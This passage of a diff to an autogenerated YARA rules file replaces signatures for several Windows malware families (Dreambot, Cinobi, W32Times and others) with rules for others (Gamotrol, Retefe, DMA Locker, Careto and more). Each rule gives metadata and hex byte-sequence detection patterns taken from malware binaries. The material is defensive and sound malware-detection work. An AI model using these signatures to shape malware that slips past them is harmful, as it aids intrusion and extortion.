+		$sequence_2 = { 3a01 1bc0 83e0fe 40 }
+		$sequence_3 = { 8b35???????? 57 8b7d08 eb09 803f00 }
+		$sequence_4 = { ffd6 8bd8 8b450c 0fbe00 50 ffd6 }
+		$sequence_5 = { ffd6 59 59 3bd8 74e0 }
+		$sequence_6 = { 47 ff450c 0fbe07 50 ffd6 8bd8 8b450c }
+		$sequence_7 = { 3bd8 74e0 0fb607 8b4d0c 3a01 }
+		$sequence_8 = { 5e c9 c3 56 8b742408 85f6 7412 }
+		$sequence_9 = { ff75fc ff75f4 e8???????? 59 59 83f8ff }
+		$sequence_10 = { 33d2 56 57 33c0 }
+		$sequence_11 = { 8d45cc 50 57 e8???????? 83c410 85c0 }
+		$sequence_12 = { ffd7 59 5f 5e c3 8b4c2404 }
+		$sequence_13 = { 50 ff7618 ff15???????? 59 59 85c0 }
+		$sequence_14 = { 8945fc 8b450c 53 8b5d08 56 57 8945e8 }
+		$sequence_15 = { 83c410 83f8ff 0f95c1 49 8bc1 }
+		$sequence_16 = { 59 1bc0 59 40 c3 e9???????? }
+		$sequence_17 = { 6a01 ff15???????? 8bf0 59 59 3bf7 }
+		$sequence_18 = { 33d2 c3 8bff 55 8bec b863736de0 }
+		$sequence_19 = { 53 8b5d10 56 8b7508 33d2 }
+		$sequence_20 = { 56 e8???????? 59 85c0 7625 }
+		$sequence_21 = { 8d4601 6a01 50 ff15???????? 8bf8 }
+		$sequence_22 = { eb03 83c8ff 5f 5e c3 56 }
+		$sequence_23 = { 59 5e 8b45fc c9 c3 }
+		$sequence_24 = { e8???????? 8bf0 46 56 ff15???????? 59 59 }
+		$sequence_25 = { e8???????? 59 5e 83f8ff }
+		$sequence_26 = { 5f 5e c3 8b442404 85c0 7503 }
+		$sequence_27 = { 56 57 8b7d10 7e05 83c220 eb03 }
+		$sequence_28 = { 6a7f 58 33f6 83e107 46 d3e6 85f0 }
+		$sequence_29 = { 8bf8 85ff 750f 50 50 8d45f4 }
+		$sequence_30 = { 50 ffd7 f6450801 5f 7409 56 e8???????? }
+		$sequence_31 = { 33ff 895dfc 3bc7 7509 8b0b }
+		$sequence_32 = { e8???????? 83c40c 83f8ff 740e ff75e4 ff15???????? }
+		$sequence_33 = { eb28 57 8d45f4 56 50 e8???????? }
+		$sequence_34 = { ff742410 ff742410 ff15???????? 33c9 }
+		$sequence_35 = { c20400 8b4508 8b10 8b4008 8d4e08 51 }
+		$sequence_36 = { 8b7d08 837f3c04 7405 33c0 5f 5d }
+		$sequence_37 = { 8b7d14 8975f4 3b37 7734 8b750c }
+		$sequence_38 = { ff25???????? c3 8b442404 c705????????00102500 c705????????10102500 }
+		$sequence_39 = { 56 ff15???????? 83f8ff 7433 33c0 }
+		$sequence_40 = { 0f841b010000 3bf0 0f8413010000 394708 0f840a010000 894608 }
+		$sequence_41 = { 8b442408 884101 c1e808 8801 8d4102 }
+		$sequence_42 = { ddd9 f6c444 7b09 ddd8 b8???????? eb5b 51 }
+		$sequence_43 = { 33ff 8945f4 8945f8 e8???????? 83c404 8945fc }
+		$sequence_44 = { 8945fc bacdab0000 8d45f4 52 50 }
+		$sequence_45 = { 894588 7404 40 894588 83659800 85c0 0f8610010000 }
+		$sequence_46 = { 00db 7309 7515 8a1e }
+		$sequence_47 = { 85f6 7425 3b4d10 0f8394010000 8b7514 }
+		$sequence_48 = { e8???????? dc1d???????? 83c410 dfe0 f6c444 }
 
 	condition:
-		7 of them and filesize < 470016
+		7 of them and filesize < 491520
 }
-rule MALPEDIA_Win_Dreambot_Auto : FILE
+rule MALPEDIA_Win_Gamotrol_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "53f43e42-1768-565e-8f9c-297b1c07d8f4"
+		id = "2b2204da-4f22-547c-9de3-80e2483d6d42"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dreambot_auto.yar#L1-L872"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gamotrol_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "cddaa00c4f6e4bc7a58bc64756492fafadc3729bcd6bcbd8f6bc9664c264e892"
+		logic_hash = "0a158c049548339723eb169f446010e4bcdbd33e0805ca045362a8d262920ab1"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -106104,122 +106574,34 @@ rule MALPEDIA_Win_Dreambot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4f30 83e140 0b4b18 83671800 }
-		$sequence_1 = { 85c0 751f ff15???????? 8bf8 81ffe5030000 751a }
-		$sequence_2 = { ff7320 ff15???????? 50 ff7320 56 ff5710 }
-		$sequence_3 = { ff15???????? 85c0 7410 ff742410 33ff e8???????? 8b7d0c }
-		$sequence_4 = { ffd6 8b44240c 894320 68???????? ff7320 ff15???????? }
-		$sequence_5 = { 751a 395d10 7413 8b4618 e8???????? eb09 }
-		$sequence_6 = { 68???????? 68???????? ff7320 e8???????? 8bf8 }
-		$sequence_7 = { 0f84cd000000 8d442410 50 8d442410 }
-		$sequence_8 = { 3bf3 0f8481000000 395d0c 747c 6a03 ebcc 3bf3 }
-		$sequence_9 = { 3bc2 480f45ca 488bc1 4883c438 c3 488bc4 }
-		$sequence_10 = { 395d0c 0f848d000000 6a07 ebdd 3bf3 0f8481000000 }
-		$sequence_11 = { a1???????? 85c0 7520 3bf3 741c 837d0c04 }
-		$sequence_12 = { 837d0c04 7516 ff7510 ff36 68???????? e8???????? 8bf8 }
-		$sequence_13 = { ebcc 3bf3 7474 395d0c 746f 6a0d ebbf }
-		$sequence_14 = { 746f 6a0d ebbf ff7510 53 68???????? eb54 }
-		$sequence_15 = { 8b7d08 eb24 a1???????? 85c0 }
-		$sequence_16 = { 56 68???????? e8???????? 894508 8b7d08 eb24 }
-		$sequence_17 = { 413bc5 7528 493bfd 7423 41b904000000 }
-		$sequence_18 = { c3 4053 4883ec20 4c8b4108 488bd9 }
-		$sequence_19 = { e8???????? e9???????? 493bfd 0f84b5000000 413bf5 0f84ac000000 }
-		$sequence_20 = { 4c8bc5 e8???????? 8bd8 83fbff 7508 }
-		$sequence_21 = { bb57000000 e8???????? 413bc5 7446 }
-		$sequence_22 = { 7464 413bf5 745f 8bd6 488bcf bb57000000 }
-		$sequence_23 = { 33d2 ff15???????? 4c8d5c2470 8bc7 }
-		$sequence_24 = { 747c 41b80d000000 eba7 33d2 }
-		$sequence_25 = { e8???????? eb2c 8b05???????? 413bc5 }
-		$sequence_26 = { e9???????? 8bd6 488bcf e8???????? e9???????? 4c392d???????? 740c }
-		$sequence_27 = { 46 8945f8 85c0 7551 }
-		$sequence_28 = { 8b450c 33db 895dfc e8???????? 8945f8 33ff }
-		$sequence_29 = { 817424105085b8ed 33ff 47 57 be???????? 56 8d542418 }
-		$sequence_30 = { e8???????? 4885db 7417 488b0d???????? 4c8bc3 33d2 }
-		$sequence_31 = { ff7310 ff15???????? 33d2 89b7184a0000 }
-		$sequence_32 = { 488bcb e8???????? f7d0 eb07 8b8424c8000000 3dcad2b74e }
-		$sequence_33 = { 8db4083089b9ed 57 8d45f4 50 8b450c 33db 895dfc }
-		$sequence_34 = { 8945f8 33ff eb03 8b750c ff75f8 69f60d661900 }
-		$sequence_35 = { 85c0 7551 ff33 50 }
-		$sequence_36 = { 7427 488b5308 488bc8 ff15???????? 4c8b472c 488b0d???????? }
-		$sequence_37 = { 8b463c 488b1e 2b471c 4489742478 448974247c 488b542478 }
-		$sequence_38 = { 8b87184a0000 56 33f6 46 8945f8 }
-		$sequence_39 = { 8b424c a801 0f840f010000 8b424c a806 740e e8???????? }
-		$sequence_40 = { 8a07 2c41 3c05 8a07 7704 2c37 eb0a }
-		$sequence_41 = { 89442440 488bf9 e8???????? 488d542438 33c9 ff15???????? 448b5c2438 }
-		$sequence_42 = { 488bf0 0f84a3000000 8b942490000000 4c8b442440 }
-		$sequence_43 = { 33d2 ff15???????? 8bc6 488b9c24c0000000 }
-		$sequence_44 = { ff15???????? 8945fc 85c0 741a 6804010000 8d4f10 51 }
-		$sequence_45 = { 89750c 8d750c e8???????? 8bf0 }
-		$sequence_46 = { ff15???????? 4883f8ff 488bf8 7445 488d842488000000 }
-		$sequence_47 = { 69f60d661900 ff75f4 81c65ff36e3c 89750c 8d750c }
-		$sequence_48 = { c3 6a00 6800004000 6a00 ff15???????? a3???????? }
-		$sequence_49 = { 3decc7eea6 0f84e8000000 3d0470a8c4 0f8486000000 }
-		$sequence_50 = { 7551 ff33 50 6810040000 ff15???????? 8945fc 85c0 }
-		$sequence_51 = { 48895f2c 8b464c a802 7410 8b464c }
-		$sequence_52 = { 488d4c2440 ff15???????? 0fb74c2442 b856555555 }
-		$sequence_53 = { 4c8bc3 33d2 ff15???????? 4c8b442478 488b0d???????? 33d2 }
-		$sequence_54 = { ff75fc e8???????? 8b45f0 40 c745e801000000 }
-		$sequence_55 = { ff742404 a3???????? e8???????? 85c0 7551 ff742404 e8???????? }
-		$sequence_56 = { ff35???????? ff15???????? eb22 ff7518 }
-		$sequence_57 = { e8???????? 85c0 0f849b000000 8d45f4 50 }
-		$sequence_58 = { 3bc6 7551 a1???????? 8b4014 85c0 }
-		$sequence_59 = { 493bce 753a 8b05???????? 488b0d???????? }
-		$sequence_60 = { e8???????? e9???????? 3bf3 0f8435010000 395d10 0f842c010000 }
-		$sequence_61 = { 8be5 5d c20400 8325????????00 6a00 68???????? 6a01 }
-		$sequence_62 = { e8???????? 8bf8 3bfb 0f857c040000 }
-		$sequence_63 = { 83ffff 0f843b010000 81ff02010000 0f8499000000 }
-		$sequence_64 = { 4183c501 443b2e 730a eba9 4533f6 eb08 }
-		$sequence_65 = { ff15???????? 85c0 7412 4881c720010000 4183c501 443b2e 730a }
-		$sequence_66 = { 81ff02010000 0f8499000000 f605????????08 6aff 68806967ff 56 7408 }
-		$sequence_67 = { 5b c9 c20800 55 8bec 81ec1c010000 8d4807 }
-		$sequence_68 = { 83cfff 443bd3 7349 448bdf 452bda }
-		$sequence_69 = { 498d5c2478 e8???????? 4e8b4cb61e 4e8b44b616 33c9 }
-		$sequence_70 = { 81ff02010000 0f8495000000 8b3d???????? 6aff 68806967ff }
-		$sequence_71 = { ffb72c080000 e8???????? 5e 5d 5b c3 eb10 }
-		$sequence_72 = { 493bed 75a1 488bb42480000000 4c8b742470 }
-		$sequence_73 = { 83c40c 83c01e 50 ffd7 ff35???????? }
-		$sequence_74 = { 41 f00fc108 a1???????? 83c01e 50 ff15???????? }
-		$sequence_75 = { 5b 8be5 5d c3 0fb708 6683f902 }
-		$sequence_76 = { 85c0 0f85b7000000 56 ff742428 ffd7 8bf8 }
-		$sequence_77 = { ff15???????? 8bc3 e9???????? 48895c2408 4889742410 57 }
-		$sequence_78 = { 488b15???????? 4c8d442468 48c7c101000080 ff15???????? }
-		$sequence_79 = { 83a78c00000000 33c0 c3 51 e8???????? 0558020000 }
-		$sequence_80 = { 50 ff742428 89542464 ffd3 56 57 }
-		$sequence_81 = { 56 ff742468 ffd7 85c0 0f85b7000000 }
-		$sequence_82 = { 56 0f84e9000000 ff74241c ffd7 }
-		$sequence_83 = { ff15???????? 85c0 743f 66ba2e00 498bcf ff15???????? 4885c0 }
-		$sequence_84 = { 5b c20800 51 53 57 }
-		$sequence_85 = { ff742414 e8???????? 813d????????58876837 7525 6a01 e8???????? 6a01 }
-		$sequence_86 = { 8bfb 8898d8fdffff e8???????? 448bac2400030000 440fb7db 4183fd25 }
-		$sequence_87 = { a3???????? bf???????? 33f6 8b8618c60310 e8???????? 8947fc }
-		$sequence_88 = { 8b483c 66f74401160020 7408 c744244c8e85be03 e8???????? }
-		$sequence_89 = { 89b31c70be03 740a 83c304 83fb14 72c9 eb12 }
-		$sequence_90 = { 85c0 0f849d010000 395c244c 7407 68???????? }
-		$sequence_91 = { 894df8 894dec c745e0e724be03 8945d8 751b f605????????01 7412 }
-		$sequence_92 = { e42c d08b19ec3bc2 14e1 32ec }
-		$sequence_93 = { f3ab e8???????? 8bf0 3bf3 0f85d4020000 }
-		$sequence_94 = { 8bd8 83fbff 0f843d010000 81fb02010000 0f8496000000 }
-		$sequence_95 = { 46 33048d1062be03 85ff 75cf f7d0 eb02 33c0 }
-		$sequence_96 = { 0fb6b120d00310 0fb6b9a0d00310 0fb68c0632900000 0fb7b470928a0000 894df4 8b4844 d3e6 }
-		$sequence_97 = { ffd6 ff742414 ff742414 57 e8???????? }
+		$sequence_0 = { ff15???????? 90 55 90 }
+		$sequence_1 = { eb82 55 8bec 83ec20 56 33f6 39750c }
+		$sequence_2 = { 83c40b 83ec0b 68b4c2ffff 83c410 83c4f0 6aff 68???????? }
+		$sequence_3 = { c1c804 8945fc 61 8b45f4 }
+		$sequence_4 = { 83ec0b 83c40f 83c4f1 83c45b 83ec5b 90 90 }
+		$sequence_5 = { cc 8b442404 a3???????? c3 8b442404 a3???????? a3???????? }
+		$sequence_6 = { 5d 85c0 7709 33c0 5f 5e }
+		$sequence_7 = { 8945e4 90 90 55 8bec }
+		$sequence_8 = { 81ec00020000 8d6c24fc a1???????? 33c5 898500020000 6a0c b8???????? }
+		$sequence_9 = { 6aff 6a00 68???????? 6a00 ff15???????? }
 
 	condition:
-		7 of them and filesize < 778240
+		7 of them and filesize < 376832
 }
-rule MALPEDIA_Win_Cinobi_Auto : FILE
+rule MALPEDIA_Win_Retefe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "21772936-199b-55b9-8c88-84909fbe932b"
+		id = "8aa29e0c-c404-5a57-8eda-15f9ee27924e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cinobi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cinobi_auto.yar#L1-L163"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.retefe_auto.yar#L1-L279"
 		license_url = "N/A"
-		logic_hash = "3b7b598c2d1d5a6445b3767b26d122931b2d9423a26b8573ddc77c7b26c5617b"
+		logic_hash = "2fe6220549475b9cb9f17de89d5a599ff0e604b2c25c7a541e74c1b0545a1a8f"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -106231,37 +106613,52 @@ rule MALPEDIA_Win_Cinobi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c9 c3 55 8bec 51 e8???????? 58 }
-		$sequence_1 = { 660fbe404b 668985a0fdffff 8b45f8 660fbe4005 668985a2fdffff 8b45f8 660fbe4005 }
-		$sequence_2 = { 55 8bec 83ec44 53 e8???????? }
-		$sequence_3 = { 8845ce c645cf00 8b45c0 8a4031 }
-		$sequence_4 = { 6805100000 56 8b75f0 56 ff93f7000000 }
-		$sequence_5 = { 8365dc00 8945e0 8d45fc 8945e4 8d45f4 }
-		$sequence_6 = { 50 51 ff93eb000000 8b4df4 e8???????? 8bf8 }
-		$sequence_7 = { 57 8b7dd0 894dfc 3bcb 7504 33c0 eb2c }
-		$sequence_8 = { 8a4d0c 8808 ebe5 c9 c3 }
-		$sequence_9 = { 8845fb 8d45a4 50 ff7508 e8???????? 59 }
-		$sequence_10 = { 8b45f4 ff90db000000 8945ec 837decff 7513 }
-		$sequence_11 = { 8b4510 8945ec 8b45e4 8b4dfc 8b0481 034508 }
-		$sequence_12 = { 837de000 0f85ac000000 6a02 8d87c0120000 50 }
-		$sequence_13 = { 8a5832 885dd1 8a5834 885dd2 }
-		$sequence_14 = { 837de8ff 7507 32c0 e9???????? 6a00 ff75e8 8b45f4 }
+		$sequence_0 = { 51 8bf8 ffd6 85c0 }
+		$sequence_1 = { 68f5000000 50 ff15???????? b801000000 }
+		$sequence_2 = { e8???????? 6a08 e8???????? 894604 83c404 }
+		$sequence_3 = { 6a1c 6ae1 6aa5 6a00 6a14 6aea 6abe }
+		$sequence_4 = { 894604 83c404 8bc6 e8???????? }
+		$sequence_5 = { 6adb 6a1c 6ad8 6a2f 6ad1 6a0a }
+		$sequence_6 = { 6ada 6a53 6ac7 6a36 6acb 6a18 6ac4 }
+		$sequence_7 = { 8901 8b4e04 33c0 83c404 394104 }
+		$sequence_8 = { 8b4e04 40 3b4104 72ec }
+		$sequence_9 = { e8???????? 8b4e04 8901 8b4e04 }
+		$sequence_10 = { 51 8d9570efffff 52 50 50 50 6a01 }
+		$sequence_11 = { 6afa 6acb 6a12 6a79 }
+		$sequence_12 = { c1eb18 884101 c1ea10 33c0 }
+		$sequence_13 = { 50 e8???????? 88043e 46 83c404 3bf3 75ec }
+		$sequence_14 = { 0f8520010000 33c0 8ad8 8d8d04dcffff }
+		$sequence_15 = { 803800 740b 6a18 59 }
+		$sequence_16 = { 83e809 7443 83e801 0f8501010000 c745e014344100 8b4508 8bcf }
+		$sequence_17 = { 5d 5b c20800 833d????????00 }
+		$sequence_18 = { 8b7c2410 85f6 0f840b010000 53 e8???????? }
+		$sequence_19 = { 6a00 e8???????? 803d????????00 750c 8d859cdeffff }
+		$sequence_20 = { 8b0e 394104 761c 660f1f840000000000 8b11 8a88503e4100 }
+		$sequence_21 = { ff5004 8b4ddc 8b4104 895904 85c0 7406 8b08 }
+		$sequence_22 = { 8bf0 8b5508 83c9ff 83c2f0 f00fc14a0c }
+		$sequence_23 = { 8b5c2418 89442434 8b44241c 8d48f8 }
+		$sequence_24 = { 33c0 668945e8 8b45d4 886de5 8b1485a0bf4200 }
+		$sequence_25 = { 897de0 394508 7c1f 3934bd08d44500 }
+		$sequence_26 = { 57 8d3c85a8c14200 8b0f 85c9 740b 8d4101 f7d8 }
+		$sequence_27 = { 8b01 51 ff5008 8b4e0c 85c9 7406 }
+		$sequence_28 = { 7ead 8b0d???????? 8d857869ffff 6a00 }
+		$sequence_29 = { 0fb6c0 eb17 81fa00010000 7313 8a87ccb14200 08441619 }
 
 	condition:
-		7 of them and filesize < 32768
+		7 of them and filesize < 843776
 }
-rule MALPEDIA_Win_Rc2Fm_Auto : FILE
+rule MALPEDIA_Win_Leash_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c250c949-1a89-5be3-9c88-097a9b8f6b70"
+		id = "834a92ba-9821-599a-958a-a52bb0a34e26"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rc2fm"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rc2fm_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.leash"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.leash_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "986b120a9f724a13ca09bdf0fceb457439c7912247f9f7f547406d208ddfc0d0"
+		logic_hash = "c93eec2e1f2f1d66b27a1254f16f6dd424c1be05af8702a857f092a6abe7b4de"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106275,32 +106672,32 @@ rule MALPEDIA_Win_Rc2Fm_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4885c0 7431 8b542420 488b4c2428 4533c0 e8???????? 448b442420 }
-		$sequence_1 = { 8bc1 d1e9 83e001 418b0481 33c1 3305???????? 33d2 }
-		$sequence_2 = { 48c1e004 4c89642430 4803c1 4889442438 }
-		$sequence_3 = { 33d2 ff15???????? 488b0d???????? ff15???????? e9???????? 40b70d e9???????? }
-		$sequence_4 = { 0f8736080000 4883791000 0f842b080000 48833900 750a 83790800 0f851b080000 }
-		$sequence_5 = { 41b804000000 488bc8 4889742470 4032ed 48c744242000000000 ff15???????? 85c0 }
-		$sequence_6 = { ff5010 eb62 448bc0 ba03000700 b900000100 e8???????? }
-		$sequence_7 = { ff90a8000000 85c0 792c 448bc0 ba07000a00 b903000100 e8???????? }
-		$sequence_8 = { 5e c3 ff15???????? ba06000600 b911000100 448bc0 e8???????? }
-		$sequence_9 = { 0f8781010000 83fd09 0f8778010000 448b642478 4183fc04 0f8769010000 488b4938 }
+		$sequence_0 = { e8???????? 83c408 85c0 744f 8b0e 53 83c10c }
+		$sequence_1 = { e8???????? 8bf8 8d8548feffff 6a0a 50 6a00 56 }
+		$sequence_2 = { 8b5d08 8d55cc 50 52 8d8bff000000 c645fc02 }
+		$sequence_3 = { 83c41c 83f8ff 0f8482010000 85c0 }
+		$sequence_4 = { 83c41c f2ae f7d1 2bf9 8bd1 8bf7 8bfd }
+		$sequence_5 = { 8b7c242c 6800040000 8d8328380000 57 50 e8???????? 668b44243c }
+		$sequence_6 = { aa b9ff000000 33c0 8dbc2411040000 f3ab }
+		$sequence_7 = { 8dbd5df9ffff 889d5cf9ffff f3ab 66ab aa b9ff000000 33c0 }
+		$sequence_8 = { 68???????? e8???????? a1???????? 83c40c 8d95e4f7ffff 8d8819100000 51 }
+		$sequence_9 = { e9???????? 8d8424fc290000 8d8c24fc050000 50 51 e8???????? }
 
 	condition:
-		7 of them and filesize < 410624
+		7 of them and filesize < 761856
 }
-rule MALPEDIA_Win_Alma_Communicator_Auto : FILE
+rule MALPEDIA_Win_Adhubllka_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dd1f8f96-5178-5e9c-b517-f0f999a8d81a"
+		id = "ad2942ad-0768-5d25-b2fe-1ba7ec43f66b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.alma_communicator_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.adhubllka"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.adhubllka_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "4a8409fa38b9c8a27f076e76311702617520d12f6ac449f7858d852242e0bc37"
+		logic_hash = "e47f134b0db44fb4d451c84c4568ba6117ac83a59e51548a061c4d0fcde2d289"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106314,32 +106711,32 @@ rule MALPEDIA_Win_Alma_Communicator_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83e13f 6bc930 53 8b5d10 8b0485f08f4100 56 8b7508 }
-		$sequence_1 = { 88040a 41 84c0 75f6 ba???????? }
-		$sequence_2 = { 68f4010000 e8???????? 8364242800 8bf0 59 }
-		$sequence_3 = { 8b0485f08f4100 56 8b7508 57 }
-		$sequence_4 = { 8a4f01 47 84c9 75f8 8d8de0fdffff 668907 e8???????? }
-		$sequence_5 = { eb06 8b9d18ddffff 57 e8???????? }
-		$sequence_6 = { 52 52 ff15???????? 89849da0e9ffff 43 68e8030000 }
-		$sequence_7 = { 0f4ecb 8bd9 7fe6 8bfe 8d4f01 }
-		$sequence_8 = { 59 33c9 89442414 8bf1 }
-		$sequence_9 = { 59 59 8945f4 8d45f8 50 }
+		$sequence_0 = { 8b45c8 894590 8b45c4 894598 8b45c0 898560ffffff }
+		$sequence_1 = { 03459c 8bc8 c1c307 334d94 c1c110 03f1 8bd6 }
+		$sequence_2 = { 33c9 25000f0000 c705????????01000000 3d000f0000 8b45d4 }
+		$sequence_3 = { c78424a8000000787e4100 c78424ac000000807e4100 c78424b0000000887e4100 c78424b4000000907e4100 }
+		$sequence_4 = { 8b4b14 894734 83c240 8b45e8 83c640 83e840 }
+		$sequence_5 = { ffb52cfbffff 56 ffb518fbffff 51 8b8d30fbffff e8???????? }
+		$sequence_6 = { 56 57 ff15???????? 68???????? 57 ff15???????? 8d85a4fdffff }
+		$sequence_7 = { 8b3d???????? 8b442410 8b4c2414 8b542418 d1e8 41 83ea01 }
+		$sequence_8 = { 83ff40 725c 8b45ac 8b4d9c 0f1006 8b559c 0f105610 }
+		$sequence_9 = { 7707 8b4310 3bd0 730e 8d463f 3bc8 773b }
 
 	condition:
-		7 of them and filesize < 245760
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_W32Times_Auto : FILE
+rule MALPEDIA_Win_Dma_Locker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8d0ca9de-72d5-5416-8ea3-4ffe99cecdda"
+		id = "0add9e5f-70eb-5058-aac8-c8618a1495ef"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.w32times_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dma_locker_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "f7e65aa826ad4cf269428f43fa98d18142b27ed083ec25ea57e656102267e97a"
+		logic_hash = "a7ffbc7fbe47962bc61977330ab1a66fd9d8632edda819d321196bb89e9e7e32"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106353,32 +106750,32 @@ rule MALPEDIA_Win_W32Times_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d44240c 6a00 50 53 57 56 c744242000000000 }
-		$sequence_1 = { 6a03 55 6a01 8d8c2410080000 6800000080 }
-		$sequence_2 = { 51 ffd6 8b4500 8d54242c }
-		$sequence_3 = { 8bcd 4f c1e902 f3a5 8bcd 8d9424ec010000 83e103 }
-		$sequence_4 = { 3b9c24000d0000 0f84cc090000 8a8424f0020000 84c0 0f84bd090000 8a8424e8000000 84c0 }
-		$sequence_5 = { 7534 8b2d???????? 46 56 68???????? }
-		$sequence_6 = { 8bd8 ffd7 56 ffd7 53 ff15???????? }
-		$sequence_7 = { ebd7 68???????? ff15???????? 8b1d???????? 68???????? ff15???????? 85db }
-		$sequence_8 = { b941000000 bf???????? f3ab b941000000 8dbc24f8050000 }
-		$sequence_9 = { 83c40c 85c0 0f85e00c0000 8b4b04 6a04 }
+		$sequence_0 = { e8???????? 8bf0 85f6 0f84ab000000 e8???????? }
+		$sequence_1 = { 83c404 83c310 ff4c2414 89470c 8b7c2410 758d }
+		$sequence_2 = { ff15???????? 85c0 7404 c6461801 }
+		$sequence_3 = { 50 6a00 56 6a19 68fe010000 6894020000 6854010000 }
+		$sequence_4 = { 6a01 6a00 6a00 6a00 688a020000 6a00 6a00 }
+		$sequence_5 = { e8???????? 8bf8 83c408 85ff 7425 8b45e4 }
+		$sequence_6 = { 53 e8???????? 84c0 744f 686c060000 e8???????? 83c404 }
+		$sequence_7 = { eb0e 8b4810 8b7808 bb2b000000 894df8 33f6 56 }
+		$sequence_8 = { 6683f87f 8d642408 0f85be730000 eb00 f30f7e442404 }
+		$sequence_9 = { 83c408 85f6 0f840e040000 56 32db e8???????? }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 532480
 }
-rule MALPEDIA_Win_Xiaoba_Auto : FILE
+rule MALPEDIA_Win_Careto_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "15cc05c8-af5c-56f2-a0b2-68d5a40a2950"
+		id = "57e5d9f7-b1a4-5fc9-9a67-0b8686d462cc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xiaoba"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xiaoba_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.careto"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.careto_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "95db22137ae310cb1c06897611cc39a7bd77badcb0dab70f72ac629d2a8f20ac"
+		logic_hash = "e5dc00dd8daf311387d91262fca293d89a75fa8c242ab0cc183af2043a20f18b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106392,32 +106789,32 @@ rule MALPEDIA_Win_Xiaoba_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7407 a9???????? 7557 8b8644010000 33c9 668b8e48010000 85c9 }
-		$sequence_1 = { d9c0 dc642428 dd5c2440 dd442410 dc642420 dd442440 d9c1 }
